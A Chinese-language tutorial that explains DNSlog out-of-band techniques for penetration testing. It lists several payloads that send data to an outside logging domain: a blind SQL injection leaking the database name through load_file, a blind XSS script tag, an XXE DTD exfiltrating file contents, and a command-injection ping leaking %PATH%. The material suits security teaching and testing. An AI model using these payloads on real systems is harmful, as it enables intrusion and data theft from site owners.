深入理解DNSlog
0x00 DNSlog 介紹
首先我們知道DNS是起ip與域名的解析的服務(wù),通過ip可以解析到對應(yīng)的域名。DNSlog就是儲存在DNS上的域名相關(guān)的信息,它記錄著你對域名或者IP的訪問信息,也就是類似于日志文件,
0x01 DNSlog回顯原理
首先了解一下多級域名的概念,我們知道因特網(wǎng)采用樹狀結(jié)構(gòu)命名方法,按組織結(jié)構(gòu)劃分域是一個名字空間中一個被管理的劃分,域可劃分為子域,子域再可被劃分為多級域名稱為一級域名,二級域名,三級域名,從一個域名地址來從右到左依次是頂級域名,二級域名,三級域名,例如 gaobai.kxsy.com,
通俗的說就是我有個域名kxsy.work,我將域名設(shè)置對應(yīng)的ip 2.2.2.2 上,這樣當(dāng)我向dns服務(wù)器發(fā)起kxsy.work的解析請求時,DNSlog中會記錄下他給kxsy.work解析,解析值為2.2.2.2,而我們這個解析的記錄的值就是我們要利用的地方,這個過程被記錄下來就是DNSlog,
0x02 DNSlog 應(yīng)用
1.sql布爾盲注、時間盲注,注入的效率低且線程高容易被waf攔截,又或者是目標(biāo)站點沒有回顯可利用NDSlog
2.無回顯的命令執(zhí)行
推薦三個大眾化的免費dns解析記錄網(wǎng)站
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
0x03 DNSlog回顯注入條件
1.數(shù)據(jù)庫root權(quán)限,
2.數(shù)據(jù)庫可讀寫權(quán)限,secure_file_priv值為空,上期筆記有說明,
3.windows系統(tǒng),
0x04 DNSlog -sql注入
1.注冊一個dns解析服務(wù),利用唯一標(biāo)識符,以無回顯sql注入為例
2.注入測試 需要閉合語句 替換標(biāo)識符 利用盲注回顯
?id=1' and if((select load_file(concat('\\\\',(select database()),'.tlyypi.dnslog.cn\\abc'))),1,0)--+
在回顯數(shù)據(jù)時,域名能夠接受的字符是有條件限制的,某些不適合作為域名的特殊字符可能會被屏蔽掉,針對這種情況我們也可以base64編碼后再進行請求。
0x05 DNSlog 其他應(yīng)用
1.xss盲打
"<script src=http://XSS.XXXXX.ceye.io></script>"
2.SSRF
"... <!ENTITY test SYSTEM "SSRF.xxxx.ceye.io\\aa"> ..."
3.命令執(zhí)行
" ping %PATH%.pxxx.ceye.io ..."
4.XXE
XXE漏洞可以解析外部實體,就可以拿來讀取本地服務(wù)器文件,這時,我們只需把dtd文件改成這樣
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://XXXX.ceye.io/%file;'>" > %all;
到此這篇關(guān)于深入理解DNSlog 的文章就介紹到這了,更多相關(guān)DNSlog內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
RHE5服務(wù)器管理 搭建DNS服務(wù)器步驟說明[圖文]
本文介紹 RHE5中搭建DNS服務(wù)器的方法,供大家學(xué)習(xí)參考2013-03-03Windows?Server?2019?安裝架設(shè)DNS服務(wù)器
這篇文章主要介紹了Windows?Server?2019?DNS服務(wù)器的配置與管理之安裝DNS服務(wù),需要的朋友可以參考下2023-05-05Windows?Server?2019?DNS服務(wù)器的配置與管理之DNS反向解析
這篇文章主要介紹了Windows?Server?2019?DNS服務(wù)器的配置與管理之DNS反向解析,需要的朋友可以參考下2023-05-05DNS服務(wù)器中創(chuàng)建正向查找區(qū)域并在該區(qū)域下創(chuàng)建主機記錄
創(chuàng)建正向查找區(qū)域ynkm.com,并在該區(qū)域下創(chuàng)建主機記錄Webserver,ynkm.com,具體操作步驟如下,需要的朋友可以了解下2013-12-12